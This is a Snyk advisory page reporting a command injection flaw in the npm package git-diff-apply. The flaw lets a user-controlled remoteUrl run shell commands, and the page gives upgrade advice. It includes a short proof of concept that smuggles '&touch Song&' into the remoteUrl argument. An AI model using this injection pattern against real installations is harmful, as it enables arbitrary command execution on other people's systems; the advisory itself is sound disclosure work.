git-diff-apply@0.18.0 vulnerabilities

Use an unrelated remote repository to apply a git diff

  • latest version

    6.0.6

  • latest non vulnerable version

  • first published

    7 years ago

  • latest version published

    27 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the git-diff-apply package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Command Injection

    git-diff-apply is a package that can be used to reach an unrelated remote repository to apply a git diff.

    Affected versions of this package are vulnerable to Command Injection. In "index.js" file, line 240, the run command executes the git command with an user controlled variable called remoteUrl.

    PoC by JHU System Security Lab

    var root = require("git-diff-apply");
    var attack_code = "&touch Song&";
    root({"remoteUrl": "&touch Song&", "startTag": "none"})
    

    How to fix Command Injection?

    Upgrade git-diff-apply to version 0.22.2 or higher.

    <0.22.2